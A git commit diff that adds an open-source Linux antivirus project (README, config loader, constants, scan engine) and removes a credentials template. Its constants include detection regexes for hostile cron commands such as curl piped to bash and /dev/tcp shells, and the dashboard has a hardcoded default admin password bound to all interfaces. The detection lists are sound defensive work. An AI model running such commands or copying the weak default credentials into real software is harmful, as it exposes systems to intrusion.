remove infra.md.example, infra.md is the source of truth

This commit is contained in:
Azreen Jamal
2026-03-03 03:06:13 +08:00
parent 1ad3033cc1
commit a3c6d09350
86 changed files with 17093 additions and 39 deletions

View File

@@ -1,37 +0,0 @@
# Infrastructure Access — TEMPLATE
# Copy to .claude/infra.md and fill in real values.
# Share the real file via 1Password / Vault / `age` encrypted blob — NEVER commit it.
## Dokploy
- **Dashboard**: https://dokploy.example.com
- **API Token**: `dkp_...`
- **SSH User**: `deploy`
- **SSH Host**: `dokploy.example.com`
- **SSH Port**: `22`
- **SSH Key Path**: `~/.ssh/id_dokploy` ← or reference a 1Password SSH key
## Servers
| Name | IP / Host | SSH User | Notes |
|------------|------------------------|----------|----------------|
| prod-1 | 10.0.0.1 | deploy | primary node |
| staging-1 | 10.0.0.2 | deploy | staging node |
## Docker Registry
- **Registry**: `ghcr.io/your-org`
- **Username**: `bot`
- **Token**: `ghp_...`
## DNS / Cloudflare
- **API Token**: `cf_...`
- **Zone ID**: `...`
## Monitoring
- **Grafana URL**: https://grafana.example.com
- **API Key**: `eyJ...`
## Database
- **Prod Postgres**: `postgres://user:pass@host:5432/db`
- **Staging Postgres**: `postgres://user:pass@host:5432/db_staging`
## Other Secrets
<!-- Add anything else Claude Code needs to manage your infra -->

View File

@@ -2,8 +2,6 @@
## Infrastructure Access
**Always read `.claude/infra.md` at the start of every session** — it contains live credentials and connection details.
To set up: copy `.claude/infra.md.example``.claude/infra.md` and fill in real values.
**Team distribution**: share the real file via 1Password shared vault (or `age`-encrypted blob, never git).
Pi Coding Agent extension examples and experiments.

View File

@@ -0,0 +1,8 @@
AYN_MALWAREBAZAAR_API_KEY=
AYN_VIRUSTOTAL_API_KEY=
AYN_SCAN_PATH=/
AYN_QUARANTINE_PATH=/var/lib/ayn-antivirus/quarantine
AYN_DB_PATH=/var/lib/ayn-antivirus/signatures.db
AYN_LOG_PATH=/var/log/ayn-antivirus/
AYN_AUTO_QUARANTINE=false
AYN_SCAN_SCHEDULE=0 2 * * *

11
ayn-antivirus/.gitignore vendored Normal file
View File

@@ -0,0 +1,11 @@
__pycache__
*.pyc
.env
*.db
dist/
build/
*.egg-info
ayn_antivirus/signatures/yara_rules/*.yar
/quarantine_vault/
.pytest_cache
.coverage

25
ayn-antivirus/Makefile Normal file
View File

@@ -0,0 +1,25 @@
.PHONY: install dev-install test lint scan update-sigs clean
install:
pip install .
dev-install:
pip install -e ".[dev]"
test:
pytest --cov=ayn_antivirus tests/
lint:
ruff check ayn_antivirus/
black --check ayn_antivirus/
scan:
ayn-antivirus scan
update-sigs:
ayn-antivirus update
clean:
rm -rf build/ dist/ *.egg-info .pytest_cache .coverage
find . -type d -name __pycache__ -exec rm -rf {} +
find . -type f -name '*.pyc' -delete

574
ayn-antivirus/README.md Normal file
View File

@@ -0,0 +1,574 @@
<p align="center">
<pre>
██████╗ ██╗ ██╗███╗ ██╗
██╔══██╗╚██╗ ██╔╝████╗ ██║
███████║ ╚████╔╝ ██╔██╗ ██║
██╔══██║ ╚██╔╝ ██║╚██╗██║
██║ ██║ ██║ ██║ ╚████║
╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═══╝
⚔️ AYN ANTIVIRUS v1.0.0 ⚔️
Server Protection Suite
</pre>
</p>
<p align="center">
<a href="https://www.python.org/downloads/"><img src="https://img.shields.io/badge/python-3.9%2B-blue?style=for-the-badge&logo=python&logoColor=white" alt="Python 3.9+"></a>
<a href="#license"><img src="https://img.shields.io/badge/license-MIT-green?style=for-the-badge" alt="License: MIT"></a>
<a href="#"><img src="https://img.shields.io/badge/platform-linux-lightgrey?style=for-the-badge&logo=linux&logoColor=white" alt="Platform: Linux"></a>
<a href="#"><img src="https://img.shields.io/badge/version-1.0.0-orange?style=for-the-badge" alt="Version 1.0.0"></a>
</p>
---
# AYN Antivirus
**Comprehensive anti-virus, anti-malware, anti-spyware, and anti-cryptominer protection for Linux servers.**
AYN Antivirus is a purpose-built security suite designed for server environments. It combines signature-based detection, YARA rules, heuristic analysis, and live system inspection to catch threats that traditional AV tools miss — from cryptominers draining your CPU to rootkits hiding in kernel modules.
---
## Features
- 🛡️ **Real-time file system monitoring** — watches directories with inotify/FSEvents via watchdog, scans new and modified files instantly
- 🔍 **Deep file scanning with multiple detection engines** — parallel, multi-threaded scans across signature, YARA, and heuristic detectors
- 🧬 **YARA rule support** — load custom and community YARA rules for flexible pattern matching
- 📊 **Heuristic analysis** — Shannon entropy scoring, obfuscation detection, reverse-shell patterns, permission anomalies
- ⛏️ **Cryptominer detection** — process-level, network-level, and file-content analysis (stratum URLs, wallet addresses, pool domains)
- 🕵️ **Spyware & keylogger detection** — identifies keyloggers, screen/audio capture tools, data exfiltration, and shell-profile backdoors
- 🦠 **Rootkit detection** — hidden processes, hidden kernel modules, LD_PRELOAD hijacking, tampered logs, hidden network ports
- 🌐 **Auto-updating threat signatures** — pulls from abuse.ch feeds (MalwareBazaar, ThreatFox, URLhaus, Feodo Tracker) and Emerging Threats
- 🔒 **Encrypted quarantine vault** — isolates malicious files with Fernet (AES-128-CBC + HMAC-SHA256) encryption and JSON metadata
- 🔧 **Auto-remediation & patching** — kills rogue processes, fixes permissions, blocks IPs/domains, cleans cron jobs, restores system binaries
- 📝 **Reports in Text, JSON, HTML** — generate human-readable or machine-parseable reports from scan results
-**Scheduled scanning** — built-in cron-style scheduler for unattended operation
---
## Quick Start
```bash
# Install
pip install .
# Update threat signatures
sudo ayn-antivirus update
# Run a full scan
sudo ayn-antivirus scan
# Quick scan (high-risk dirs only)
sudo ayn-antivirus scan --quick
# Check protection status
ayn-antivirus status
```
---
## Installation
### From pip (local)
```bash
pip install .
```
### Editable install (development)
```bash
pip install -e ".[dev]"
```
### From source with Make
```bash
make install # production
make dev-install # development (includes pytest, black, ruff)
```
### System dependencies
AYN uses [yara-python](https://github.com/VirusTotal/yara-python) for rule-based detection. On most systems pip handles this automatically, but you may need the YARA C library:
| Distro | Command |
|---|---|
| **Debian / Ubuntu** | `sudo apt install yara libyara-dev` |
| **RHEL / CentOS / Fedora** | `sudo dnf install yara yara-devel` |
| **Arch** | `sudo pacman -S yara` |
| **macOS (Homebrew)** | `brew install yara` |
After the system library is installed, `pip install yara-python` (or `pip install .`) will link against it.
---
## Usage
All commands accept `--verbose` / `-v` for detailed output and `--config <path>` to load a custom YAML config file.
### File System Scanning
```bash
# Full scan — all configured paths
sudo ayn-antivirus scan
# Quick scan — /tmp, /var/tmp, /dev/shm, crontabs
sudo ayn-antivirus scan --quick
# Deep scan — includes memory and hidden artifacts
sudo ayn-antivirus scan --deep
# Scan a single file
ayn-antivirus scan --file /tmp/suspicious.bin
# Targeted path with exclusions
sudo ayn-antivirus scan --path /home --exclude '*.log' --exclude '*.gz'
```
### Process Scanning
```bash
# Scan running processes for miners & suspicious CPU usage
sudo ayn-antivirus scan-processes
```
Checks every running process against known miner names (xmrig, minerd, ethminer, etc.) and flags anything above the CPU threshold (default 80%).
### Network Scanning
```bash
# Inspect active connections for mining pool traffic
sudo ayn-antivirus scan-network
```
Compares remote addresses against known mining pool domains and suspicious ports (3333, 4444, 5555, 14444, etc.).
### Update Signatures
```bash
# Fetch latest threat intelligence from all feeds
sudo ayn-antivirus update
# Force re-download even if signatures are fresh
sudo ayn-antivirus update --force
```
### Quarantine Management
```bash
# List quarantined items
ayn-antivirus quarantine list
# View details of a quarantined item
ayn-antivirus quarantine info 1
# Restore a quarantined file to its original location
sudo ayn-antivirus quarantine restore 1
# Permanently delete a quarantined item
ayn-antivirus quarantine delete 1
```
### Real-Time Monitoring
```bash
# Watch configured paths in the foreground (Ctrl+C to stop)
sudo ayn-antivirus monitor
# Watch specific paths
sudo ayn-antivirus monitor --paths /var/www --paths /tmp
# Run as a background daemon
sudo ayn-antivirus monitor --daemon
```
### Report Generation
```bash
# Plain text report to stdout
ayn-antivirus report
# JSON report to a file
ayn-antivirus report --format json --output /tmp/report.json
# HTML report
ayn-antivirus report --format html --output report.html
```
### Auto-Fix / Remediation
```bash
# Preview all remediation actions (no changes)
sudo ayn-antivirus fix --all --dry-run
# Apply all remediations
sudo ayn-antivirus fix --all
# Fix a specific threat by ID
sudo ayn-antivirus fix --threat-id 3
```
### Status Check
```bash
# View protection status at a glance
ayn-antivirus status
```
Displays signature freshness, last scan time, quarantine count, real-time monitor state, and engine toggles.
### Configuration
```bash
# Show active configuration
ayn-antivirus config
# Set a config value (persisted to ~/.ayn-antivirus/config.yaml)
ayn-antivirus config --set auto_quarantine true
ayn-antivirus config --set scan_schedule '0 3 * * *'
```
---
## Configuration
### Config file locations
AYN loads configuration from the first file found (in order):
| Priority | Path |
|---|---|
| 1 | Explicit `--config <path>` flag |
| 2 | `/etc/ayn-antivirus/config.yaml` |
| 3 | `~/.ayn-antivirus/config.yaml` |
### Config file options
```yaml
# Directories to scan
scan_paths:
- /
exclude_paths:
- /proc
- /sys
- /dev
- /run
- /snap
# Storage
quarantine_path: /var/lib/ayn-antivirus/quarantine
db_path: /var/lib/ayn-antivirus/signatures.db
log_path: /var/log/ayn-antivirus/
# Behavior
auto_quarantine: false
scan_schedule: "0 2 * * *"
max_file_size: 104857600 # 100 MB
# Engines
enable_yara: true
enable_heuristics: true
enable_realtime_monitor: false
# API keys (optional)
api_keys:
malwarebazaar: ""
virustotal: ""
```
### Environment variables
Environment variables override config file values. Copy `.env.sample` to `.env` and populate as needed.
| Variable | Description | Default |
|---|---|---|
| `AYN_SCAN_PATH` | Comma-separated scan paths | `/` |
| `AYN_QUARANTINE_PATH` | Quarantine vault directory | `/var/lib/ayn-antivirus/quarantine` |
| `AYN_DB_PATH` | Signature database path | `/var/lib/ayn-antivirus/signatures.db` |
| `AYN_LOG_PATH` | Log directory | `/var/log/ayn-antivirus/` |
| `AYN_AUTO_QUARANTINE` | Auto-quarantine on detection (`true`/`false`) | `false` |
| `AYN_SCAN_SCHEDULE` | Cron expression for scheduled scans | `0 2 * * *` |
| `AYN_MAX_FILE_SIZE` | Max file size to scan (bytes) | `104857600` |
| `AYN_MALWAREBAZAAR_API_KEY` | MalwareBazaar API key | — |
| `AYN_VIRUSTOTAL_API_KEY` | VirusTotal API key | — |
---
## Threat Intelligence Feeds
AYN aggregates indicators from multiple open-source threat intelligence feeds:
| Feed | Source | Data Type |
|---|---|---|
| **MalwareBazaar** | [bazaar.abuse.ch](https://bazaar.abuse.ch) | Malware sample hashes (SHA-256) |
| **ThreatFox** | [threatfox.abuse.ch](https://threatfox.abuse.ch) | IOCs — IPs, domains, URLs |
| **URLhaus** | [urlhaus.abuse.ch](https://urlhaus.abuse.ch) | Malware distribution URLs |
| **Feodo Tracker** | [feodotracker.abuse.ch](https://feodotracker.abuse.ch) | Botnet C2 IP addresses |
| **Emerging Threats** | [rules.emergingthreats.net](https://rules.emergingthreats.net) | Suricata / Snort IOCs |
| **YARA Rules** | Community & custom | Pattern-matching rules (`signatures/yara_rules/`) |
Signatures are stored in a local SQLite database (`signatures.db`) with separate tables for hashes, IPs, domains, and URLs. Run `ayn-antivirus update` to pull the latest data.
---
## Architecture
```
┌─────────────────────────────────────────────────────────────────┐
│ CLI (cli.py) │
│ Click commands + Rich UI │
└───────────────────────────────┬─────────────────────────────────┘
┌───────────▼───────────┐
│ Core Scan Engine │
│ (core/engine.py) │
└───┬────┬────┬────┬───┘
│ │ │ │
┌─────────────┘ │ │ └─────────────┐
▼ ▼ ▼ ▼
┌─────────────────┐ ┌──────────────┐ ┌──────────────────────┐
│ Detectors │ │ Scanners │ │ Monitor │
│ ┌─────────────┐ │ │ ┌──────────┐ │ │ ┌──────────────────┐ │
│ │ Signature │ │ │ │ File │ │ │ │ Real-time │ │
│ │ YARA │ │ │ │ Process │ │ │ │ (watchdog) │ │
│ │ Heuristic │ │ │ │ Network │ │ │ └──────────────────┘ │
│ │ Cryptominer │ │ │ │ Memory │ │ └──────────────────────┘
│ │ Spyware │ │ │ └──────────┘ │
│ │ Rootkit │ │ └──────────────┘
│ └─────────────┘ │
└─────────────────┘
│ ┌──────────────────────┐
│ ┌───────────────────┐ │ Signatures │
└───►│ Event Bus │ │ ┌──────────────────┐ │
│ (core/event_bus) │ │ │ Feed Manager │ │
└──────┬────────────┘ │ │ Hash DB │ │
│ │ │ IOC DB │ │
┌──────────┼──────────┐ │ │ YARA Rules │ │
▼ ▼ ▼ │ └──────────────────┘ │
┌────────────┐ ┌────────┐ ┌───────┐ └──────────────────────┘
│ Quarantine │ │Reports │ │Remedy │
│ Vault │ │ Gen. │ │Patcher│
│ (Fernet) │ │txt/json│ │ │
│ │ │ /html │ │ │
└────────────┘ └────────┘ └───────┘
```
### Module summary
| Module | Path | Responsibility |
|---|---|---|
| **CLI** | `cli.py` | User-facing commands (Click + Rich) |
| **Config** | `config.py` | YAML & env-var configuration loader |
| **Engine** | `core/engine.py` | Orchestrates file/process/network scans |
| **Event Bus** | `core/event_bus.py` | Internal pub/sub for scan events |
| **Scheduler** | `core/scheduler.py` | Cron-based scheduled scans |
| **Detectors** | `detectors/` | Pluggable detection engines (signature, YARA, heuristic, cryptominer, spyware, rootkit) |
| **Scanners** | `scanners/` | File, process, network, and memory scanners |
| **Monitor** | `monitor/realtime.py` | Watchdog-based real-time file watcher |
| **Quarantine** | `quarantine/vault.py` | Fernet-encrypted file isolation vault |
| **Remediation** | `remediation/patcher.py` | Auto-fix engine (kill, block, clean, restore) |
| **Reports** | `reports/generator.py` | Text, JSON, and HTML report generation |
| **Signatures** | `signatures/` | Feed fetchers, hash DB, IOC DB, YARA rules |
---
## Auto-Patching Capabilities
The remediation engine (`ayn-antivirus fix`) can automatically apply the following fixes:
| Action | Description |
|---|---|
| **Fix permissions** | Strips SUID, SGID, and world-writable bits from compromised files |
| **Kill processes** | Sends SIGKILL to confirmed malicious processes (miners, reverse shells) |
| **Block IPs** | Adds `iptables` DROP rules for C2 and mining pool IP addresses |
| **Block domains** | Redirects malicious domains to `127.0.0.1` via `/etc/hosts` |
| **Clean cron jobs** | Removes entries matching suspicious patterns (curl\|bash, xmrig, etc.) |
| **Fix LD_PRELOAD** | Clears `/etc/ld.so.preload` entries injected by rootkits |
| **Clean SSH keys** | Removes `command=` forced-command entries from `authorized_keys` |
| **Remove startup entries** | Strips malicious lines from init scripts, systemd units, and `rc.local` |
| **Restore binaries** | Reinstalls tampered system binaries via `apt`/`dnf`/`yum` package manager |
> **Tip:** Always run with `--dry-run` first to preview changes before applying.
---
## Running as a Service
Create a systemd unit to run AYN as a persistent real-time monitor:
```ini
# /etc/systemd/system/ayn-antivirus.service
[Unit]
Description=AYN Antivirus Real-Time Monitor
After=network.target
[Service]
Type=simple
ExecStart=/usr/local/bin/ayn-antivirus monitor --daemon
ExecReload=/bin/kill -HUP $MAINPID
Restart=on-failure
RestartSec=10
User=root
Group=root
# Hardening
ProtectSystem=strict
ReadWritePaths=/var/lib/ayn-antivirus /var/log/ayn-antivirus
NoNewPrivileges=false
PrivateTmp=true
[Install]
WantedBy=multi-user.target
```
```bash
# Enable and start
sudo systemctl daemon-reload
sudo systemctl enable ayn-antivirus
sudo systemctl start ayn-antivirus
# Check status
sudo systemctl status ayn-antivirus
# View logs
sudo journalctl -u ayn-antivirus -f
```
Optionally add a timer unit for scheduled signature updates:
```ini
# /etc/systemd/system/ayn-antivirus-update.timer
[Unit]
Description=AYN Antivirus Signature Update Timer
[Timer]
OnCalendar=*-*-* 02:00:00
Persistent=true
[Install]
WantedBy=timers.target
```
```ini
# /etc/systemd/system/ayn-antivirus-update.service
[Unit]
Description=AYN Antivirus Signature Update
[Service]
Type=oneshot
ExecStart=/usr/local/bin/ayn-antivirus update
User=root
```
```bash
sudo systemctl enable --now ayn-antivirus-update.timer
```
---
## Development
### Prerequisites
- Python 3.9+
- [YARA](https://virustotal.github.io/yara/) C library (for yara-python)
### Setup
```bash
git clone <repo-url>
cd ayn-antivirus
pip install -e ".[dev]"
```
### Run tests
```bash
make test
# or directly:
pytest --cov=ayn_antivirus tests/
```
### Lint & format
```bash
make lint
# or directly:
ruff check ayn_antivirus/
black --check ayn_antivirus/
```
### Auto-format
```bash
black ayn_antivirus/
```
### Project layout
```
ayn-antivirus/
├── ayn_antivirus/
│ ├── __init__.py # Package version
│ ├── __main__.py # python -m ayn_antivirus entry point
│ ├── cli.py # Click CLI commands
│ ├── config.py # Configuration loader
│ ├── constants.py # Thresholds, paths, known indicators
│ ├── core/
│ │ ├── engine.py # Scan engine orchestrator
│ │ ├── event_bus.py # Internal event system
│ │ └── scheduler.py # Cron-based scheduler
│ ├── detectors/
│ │ ├── base.py # BaseDetector ABC + DetectionResult
│ │ ├── signature_detector.py
│ │ ├── yara_detector.py
│ │ ├── heuristic_detector.py
│ │ ├── cryptominer_detector.py
│ │ ├── spyware_detector.py
│ │ └── rootkit_detector.py
│ ├── scanners/
│ │ ├── file_scanner.py
│ │ ├── process_scanner.py
│ │ ├── network_scanner.py
│ │ └── memory_scanner.py
│ ├── monitor/
│ │ └── realtime.py # Watchdog-based file watcher
│ ├── quarantine/
│ │ └── vault.py # Fernet-encrypted quarantine
│ ├── remediation/
│ │ └── patcher.py # Auto-fix engine
│ ├── reports/
│ │ └── generator.py # Report output (text/json/html)
│ ├── signatures/
│ │ ├── manager.py # Feed orchestrator
│ │ ├── db/ # Hash DB + IOC DB (SQLite)
│ │ ├── feeds/ # Feed fetchers (abuse.ch, ET, etc.)
│ │ └── yara_rules/ # .yar rule files
│ └── utils/
│ ├── helpers.py
│ └── logger.py
├── tests/ # pytest test suite
├── pyproject.toml # Build config & dependencies
├── Makefile # Dev shortcuts
├── .env.sample # Environment variable template
└── README.md
```
### Contributing
1. Fork the repo and create a feature branch
2. Write tests for new functionality
3. Ensure `make lint` and `make test` pass
4. Submit a pull request
---
## License
This project is licensed under the **MIT License**. See [LICENSE](LICENSE) for details.
---
<p align="center">
<strong>⚔️ Stay protected. Stay vigilant. ⚔️</strong>
</p>

View File

@@ -0,0 +1 @@
__version__ = '1.0.0'

View File

@@ -0,0 +1,4 @@
from ayn_antivirus.cli import main
if __name__ == "__main__":
main()

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,142 @@
"""Configuration loader for AYN Antivirus."""
from __future__ import annotations
import os
from dataclasses import dataclass, field
from pathlib import Path
from typing import Any, Dict, List, Optional
import yaml
from ayn_antivirus.constants import (
DEFAULT_CONFIG_PATHS,
DEFAULT_DASHBOARD_DB_PATH,
DEFAULT_DASHBOARD_HOST,
DEFAULT_DASHBOARD_PASSWORD,
DEFAULT_DASHBOARD_PORT,
DEFAULT_DASHBOARD_USERNAME,
DEFAULT_DB_PATH,
DEFAULT_LOG_PATH,
DEFAULT_QUARANTINE_PATH,
DEFAULT_SCAN_PATH,
MAX_FILE_SIZE,
)
@dataclass
class Config:
"""Application configuration, loaded from YAML config files or environment variables."""
scan_paths: List[str] = field(default_factory=lambda: [DEFAULT_SCAN_PATH])
exclude_paths: List[str] = field(
default_factory=lambda: ["/proc", "/sys", "/dev", "/run", "/snap"]
)
quarantine_path: str = DEFAULT_QUARANTINE_PATH
db_path: str = DEFAULT_DB_PATH
log_path: str = DEFAULT_LOG_PATH
auto_quarantine: bool = False
scan_schedule: str = "0 2 * * *"
api_keys: Dict[str, str] = field(default_factory=dict)
max_file_size: int = MAX_FILE_SIZE
enable_yara: bool = True
enable_heuristics: bool = True
enable_realtime_monitor: bool = False
dashboard_host: str = DEFAULT_DASHBOARD_HOST
dashboard_port: int = DEFAULT_DASHBOARD_PORT
dashboard_db_path: str = DEFAULT_DASHBOARD_DB_PATH
dashboard_username: str = DEFAULT_DASHBOARD_USERNAME
dashboard_password: str = DEFAULT_DASHBOARD_PASSWORD
@classmethod
def load(cls, config_path: Optional[str] = None) -> Config:
"""Load configuration from a YAML file, then overlay environment variables.
Search order:
1. Explicit ``config_path`` argument.
2. /etc/ayn-antivirus/config.yaml
3. ~/.ayn-antivirus/config.yaml
4. Environment variables (always applied last as overrides).
"""
data: Dict[str, Any] = {}
paths_to_try = [config_path] if config_path else DEFAULT_CONFIG_PATHS
for path in paths_to_try:
if path and Path(path).is_file():
with open(path, "r") as fh:
data = yaml.safe_load(fh) or {}
break
defaults = cls()
config = cls(
scan_paths=data.get("scan_paths", defaults.scan_paths),
exclude_paths=data.get("exclude_paths", defaults.exclude_paths),
quarantine_path=data.get("quarantine_path", DEFAULT_QUARANTINE_PATH),
db_path=data.get("db_path", DEFAULT_DB_PATH),
log_path=data.get("log_path", DEFAULT_LOG_PATH),
auto_quarantine=data.get("auto_quarantine", False),
scan_schedule=data.get("scan_schedule", "0 2 * * *"),
api_keys=data.get("api_keys", {}),
max_file_size=data.get("max_file_size", MAX_FILE_SIZE),
enable_yara=data.get("enable_yara", True),
enable_heuristics=data.get("enable_heuristics", True),
enable_realtime_monitor=data.get("enable_realtime_monitor", False),
dashboard_host=data.get("dashboard_host", DEFAULT_DASHBOARD_HOST),
dashboard_port=data.get("dashboard_port", DEFAULT_DASHBOARD_PORT),
dashboard_db_path=data.get("dashboard_db_path", DEFAULT_DASHBOARD_DB_PATH),
dashboard_username=data.get("dashboard_username", DEFAULT_DASHBOARD_USERNAME),
dashboard_password=data.get("dashboard_password", DEFAULT_DASHBOARD_PASSWORD),
)
# --- Environment variable overrides ---
config._apply_env_overrides()
return config
def _apply_env_overrides(self) -> None:
"""Override config fields with AYN_* environment variables when set."""
if os.getenv("AYN_SCAN_PATH"):
self.scan_paths = [p.strip() for p in os.environ["AYN_SCAN_PATH"].split(",")]
if os.getenv("AYN_QUARANTINE_PATH"):
self.quarantine_path = os.environ["AYN_QUARANTINE_PATH"]
if os.getenv("AYN_DB_PATH"):
self.db_path = os.environ["AYN_DB_PATH"]
if os.getenv("AYN_LOG_PATH"):
self.log_path = os.environ["AYN_LOG_PATH"]
if os.getenv("AYN_AUTO_QUARANTINE"):
self.auto_quarantine = os.environ["AYN_AUTO_QUARANTINE"].lower() in (
"true",
"1",
"yes",
)
if os.getenv("AYN_SCAN_SCHEDULE"):
self.scan_schedule = os.environ["AYN_SCAN_SCHEDULE"]
if os.getenv("AYN_MALWAREBAZAAR_API_KEY"):
self.api_keys["malwarebazaar"] = os.environ["AYN_MALWAREBAZAAR_API_KEY"]
if os.getenv("AYN_VIRUSTOTAL_API_KEY"):
self.api_keys["virustotal"] = os.environ["AYN_VIRUSTOTAL_API_KEY"]
if os.getenv("AYN_MAX_FILE_SIZE"):
self.max_file_size = int(os.environ["AYN_MAX_FILE_SIZE"])
if os.getenv("AYN_DASHBOARD_HOST"):
self.dashboard_host = os.environ["AYN_DASHBOARD_HOST"]
if os.getenv("AYN_DASHBOARD_PORT"):
self.dashboard_port = int(os.environ["AYN_DASHBOARD_PORT"])
if os.getenv("AYN_DASHBOARD_DB_PATH"):
self.dashboard_db_path = os.environ["AYN_DASHBOARD_DB_PATH"]
if os.getenv("AYN_DASHBOARD_USERNAME"):
self.dashboard_username = os.environ["AYN_DASHBOARD_USERNAME"]
if os.getenv("AYN_DASHBOARD_PASSWORD"):
self.dashboard_password = os.environ["AYN_DASHBOARD_PASSWORD"]

View File

@@ -0,0 +1,161 @@
"""Constants for AYN Antivirus."""
import os
# --- Default Paths ---
DEFAULT_CONFIG_PATHS = [
"/etc/ayn-antivirus/config.yaml",
os.path.expanduser("~/.ayn-antivirus/config.yaml"),
]
DEFAULT_SCAN_PATH = "/"
DEFAULT_QUARANTINE_PATH = "/var/lib/ayn-antivirus/quarantine"
DEFAULT_DB_PATH = "/var/lib/ayn-antivirus/signatures.db"
DEFAULT_LOG_PATH = "/var/log/ayn-antivirus/"
DEFAULT_YARA_RULES_DIR = os.path.join(os.path.dirname(__file__), "signatures", "yara_rules")
QUARANTINE_ENCRYPTION_KEY_FILE = "/var/lib/ayn-antivirus/.quarantine.key"
# --- Database ---
DB_SCHEMA_VERSION = 1
# --- Scan Limits ---
SCAN_CHUNK_SIZE = 65536 # 64 KB
MAX_FILE_SIZE = 100 * 1024 * 1024 # 100 MB
HIGH_CPU_THRESHOLD = 80 # percent
# --- Suspicious File Extensions ---
SUSPICIOUS_EXTENSIONS = [
".php",
".sh",
".py",
".pl",
".rb",
".js",
".exe",
".elf",
".bin",
".so",
".dll",
]
# --- Crypto Miner Process Names ---
CRYPTO_MINER_PROCESS_NAMES = [
"xmrig",
"minerd",
"cpuminer",
"ethminer",
"claymore",
"phoenixminer",
"nbminer",
"t-rex",
"gminer",
"lolminer",
"bfgminer",
"cgminer",
"ccminer",
"nicehash",
"excavator",
"nanominer",
"teamredminer",
"wildrig",
"srbminer",
"xmr-stak",
"randomx",
"cryptonight",
]
# --- Crypto Pool Domains ---
CRYPTO_POOL_DOMAINS = [
"pool.minergate.com",
"xmrpool.eu",
"nanopool.org",
"mining.pool.observer",
"supportxmr.com",
"pool.hashvault.pro",
"moneroocean.stream",
"minexmr.com",
"herominers.com",
"2miners.com",
"f2pool.com",
"ethermine.org",
"unmineable.com",
"nicehash.com",
"prohashing.com",
"zpool.ca",
"miningpoolhub.com",
]
# --- Suspicious Mining Ports ---
SUSPICIOUS_PORTS = [
3333,
4444,
5555,
7777,
8888,
9999,
14433,
14444,
45560,
45700,
]
# --- Known Rootkit Files ---
KNOWN_ROOTKIT_FILES = [
"/usr/lib/libproc.so",
"/usr/lib/libext-2.so",
"/usr/lib/libns2.so",
"/usr/lib/libpam.so.1",
"/dev/shm/.x",
"/dev/shm/.r",
"/tmp/.ICE-unix/.x",
"/tmp/.X11-unix/.x",
"/usr/bin/sourcemask",
"/usr/bin/sshd2",
"/usr/sbin/xntpd",
"/etc/cron.d/.hidden",
"/var/tmp/.bash_history",
]
# --- Suspicious Cron Patterns ---
SUSPICIOUS_CRON_PATTERNS = [
r"curl\s+.*\|\s*sh",
r"wget\s+.*\|\s*sh",
r"curl\s+.*\|\s*bash",
r"wget\s+.*\|\s*bash",
r"/dev/tcp/",
r"base64\s+--decode",
r"xmrig",
r"minerd",
r"cryptonight",
r"\bcurl\b.*-o\s*/tmp/",
r"\bwget\b.*-O\s*/tmp/",
r"nohup\s+.*&",
r"/dev/null\s+2>&1",
]
# --- Malicious Environment Variables ---
MALICIOUS_ENV_VARS = [
"LD_PRELOAD",
"LD_LIBRARY_PATH",
"LD_AUDIT",
"LD_DEBUG",
"HISTFILE=/dev/null",
"PROMPT_COMMAND",
"BASH_ENV",
"ENV",
"CDPATH",
]
# ── Dashboard ──────────────────────────────────────────────────────────
DEFAULT_DASHBOARD_HOST = "0.0.0.0"
DEFAULT_DASHBOARD_PORT = 7777
DEFAULT_DASHBOARD_DB_PATH = "/var/lib/ayn-antivirus/dashboard.db"
DASHBOARD_COLLECTOR_INTERVAL = 10 # seconds between metric samples
DASHBOARD_REFRESH_INTERVAL = 30 # JS auto-refresh seconds
DASHBOARD_MAX_THREATS_DISPLAY = 50
DASHBOARD_MAX_LOG_LINES = 20
DASHBOARD_SCAN_HISTORY_DAYS = 30
DASHBOARD_METRIC_RETENTION_HOURS = 168 # 7 days
# Dashboard authentication
DEFAULT_DASHBOARD_USERNAME = "admin"
DEFAULT_DASHBOARD_PASSWORD = "ayn@2024"

View File

@@ -0,0 +1,917 @@
"""Core scan engine for AYN Antivirus.
Orchestrates file-system, process, and network scanning by delegating to
pluggable detectors (hash lookup, YARA, heuristic) and emitting events via
the :pymod:`event_bus`.
"""
from __future__ import annotations
import logging
import os
import time
import uuid
from concurrent.futures import ThreadPoolExecutor, as_completed
from dataclasses import dataclass, field
from datetime import datetime
from enum import Enum, auto
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Protocol
from ayn_antivirus.config import Config
from ayn_antivirus.core.event_bus import EventType, event_bus
from ayn_antivirus.utils.helpers import hash_file as _hash_file_util
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Enums
# ---------------------------------------------------------------------------
class ThreatType(Enum):
"""Classification of a detected threat."""
VIRUS = auto()
MALWARE = auto()
SPYWARE = auto()
MINER = auto()
ROOTKIT = auto()
class Severity(Enum):
"""Threat severity level, ordered low → critical."""
LOW = 1
MEDIUM = 2
HIGH = 3
CRITICAL = 4
class ScanType(Enum):
"""Kind of scan that was executed."""
FULL = "full"
QUICK = "quick"
DEEP = "deep"
SINGLE_FILE = "single_file"
TARGETED = "targeted"
# ---------------------------------------------------------------------------
# Data classes
# ---------------------------------------------------------------------------
@dataclass
class ThreatInfo:
"""A single threat detected during a file scan."""
path: str
threat_name: str
threat_type: ThreatType
severity: Severity
detector_name: str
details: str = ""
timestamp: datetime = field(default_factory=datetime.utcnow)
file_hash: str = ""
@dataclass
class FileScanResult:
"""Result of scanning a single file."""
path: str
scanned: bool = True
file_hash: str = ""
size: int = 0
threats: List[ThreatInfo] = field(default_factory=list)
error: Optional[str] = None
@property
def is_clean(self) -> bool:
return len(self.threats) == 0 and self.error is None
@dataclass
class ProcessThreat:
"""A suspicious process discovered at runtime."""
pid: int
name: str
cmdline: str
cpu_percent: float
memory_percent: float
threat_type: ThreatType
severity: Severity
details: str = ""
@dataclass
class NetworkThreat:
"""A suspicious network connection."""
local_addr: str
remote_addr: str
pid: Optional[int]
process_name: str
threat_type: ThreatType
severity: Severity
details: str = ""
@dataclass
class ScanResult:
"""Aggregated result of a path / multi-file scan."""
scan_id: str = field(default_factory=lambda: uuid.uuid4().hex[:12])
start_time: datetime = field(default_factory=datetime.utcnow)
end_time: Optional[datetime] = None
files_scanned: int = 0
files_skipped: int = 0
threats: List[ThreatInfo] = field(default_factory=list)
scan_path: str = ""
scan_type: ScanType = ScanType.FULL
@property
def duration_seconds(self) -> float:
if self.end_time is None:
return 0.0
return (self.end_time - self.start_time).total_seconds()
@property
def is_clean(self) -> bool:
return len(self.threats) == 0
@dataclass
class ProcessScanResult:
